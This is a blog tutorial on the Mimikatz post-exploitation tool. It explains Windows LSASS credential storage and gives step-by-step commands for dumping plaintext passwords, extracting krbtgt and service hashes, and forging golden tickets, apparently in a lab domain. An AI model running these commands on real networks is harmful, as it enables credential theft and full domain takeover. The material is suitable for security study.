Mimikatz

In this post we will understand How to use Mimikatz for post exploitation.

Photo by Kote Puerto on Unsplash

In French Mimikatz stands for cute cats but this tool is definitely a hell cat. This is a Post exploitation tool intended to help attckers Blackhat, red-blue teamers or penetration testers to extract Login Ids, passwords and auth tokens from hacked system in order to elevate privileges and gain greater access on the breached network.

The tool was first introduced by a french hacker in 2011 to microsoft. Mimikatz uses DLL injection on live status so that it can print out the user’s Windows login passowords as a plain text.

Now the first thing to understand is Local System Authority (LSA).

The local authority is a protected system process that authenticates and logs users on the local computer. In Addition LSA maintains information about all the aspects of local security on a computer (these aspects are known as the local security policy), and it provides various services for translation between names and security identifiers(SIDs). The security system process, Local Authority Server Service (LSASS), keeps track of the security policies and the accounts that are in effect on a computer system.

LSA also calls a subsystem process, LSASS and this process stores passwords in memory.

The Local Security Authority Subsystem Service(LSASS) stores credentials in memory on behalf of users with active windows sessions. The stored credentials let user seamlessly access network resources, such as files shares, Exchange server mailboxes and sites without re-entering their credentials for each remote service.

LSASS can store passwords in multiple forms, including -

• NT hash
• LAN Manager hash
• Kerberos Tickets( ticket granting tickets(TGTs))
• Reversibly encrypted plaintext

But LSASS doesn’t actually do the authentication, it creates the security tokens after the authentication packages tells it the provide credentials are valid.

The role of authentication dll is to examine whether the user’s name is an agreement with the password. If the authentication information is consistent, it returns the user’s specific information to LSASS.

LSASS create the token based on this. In typically there are MsV1_0, TsPKg, Wdigest, LineSSP, Kerberos and SSP for windows auth packageand each package is carried out by various usage like RDP and web services.

Install Mimikatz

We can download precompiled binaries for windows from Github page of mimikatz

gentilkiwi/mimikatz

If you try to run it in your system then you have to disable antivirus. This isn’t a malware but better run in a isolated environment for better understanding without ton’s of errors.

Commands

The default format for issuing commands is to enter the commands module followed by two colons and the command name. We can enter more than one command at a time, but any commands that include spaces need to be set off by quotes.

mimikatz # privilege::debug

1. The process of extracting clear text passwords starts by invoking the debug command from the privilege module. This command elevates the permisions for mimikatz to get the debug privilege level.

2. Let’s record a log for interaction with mimikatz.

mimikatz # log

loging

The default log file is mimkatz.log. we can generate our own log file with any custom name.

mimikatz # log customname.log

Once logging is turned on the rest of the session will be recorded for exfilteration or analysis purpose.

Lets dump passwords

mimikatz # sekurlsa::logonpasswords

logon

The logonpasswords command extracts a user ID and password for currently logged-in and recently logged-in users of the target system.

Golden Silver Ticket Attacks

Most time Mimikatz was used to dump user password but we will be using it to make Golden and Silver Tickets.

The key difference between both the ticket is that Silver ticket is limited to the service targeted whether golden ticket has access to any kerberos service.

Check out this awesome page for understanding kerberos

Kerberos Authentication Explained

Understanding Krbtgt

In order to fully understand how these attacks work you need to understand what the difference between a KRBTGT and a TGT is. A KRBTGT is the service account for the KDC this is the Key Distribution Center that issues all of the tickets to the clients. If you impersonate this account and create a golden ticket form the KRBTGT you give yourself the ability to create a service ticket for anything you want. A TGT is a ticket to a service account issued by the KDC and can only access that service the TGT is from like the SQLService ticket.

Dump the krbtgt hash-

mimikatz # lsadump::lsa /inject /name:krbtgt

This will dump the hash needed to create a golden ticket.

krbtgt hash

Dump the SQLService hash

mimikatz # lsadump::lsa /inject /name:SQLService

SQLService hash for silver ticket

SQLService hash can be used to create a silver ticket.

Creating a Golden Ticket

Creating the ticket part is really simple we just need to take the values from the krbtgt part and made our custom command like this.

mimikatz # kerberos::golden /user:Administartor /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

/krbtgt:(NTLM Hash)
/domain:(domain name)
/sid:(krbtgt sid)

Using the Golden Ticket

mimikatz # misc::cmd

This command will open a new terminal with elevated privileges.

we are now the controller

I am Ending this post from my side for now but there are tons of other uses as well for Mimikatz. I will expand this post time to time when i will understand them and executed them on my own till then there’s a meme for you.

imgflip.com

Do Some research also there are tons of great articles in the wild you just have to read them and make notes.

Author:- Harsh Dushyant Singh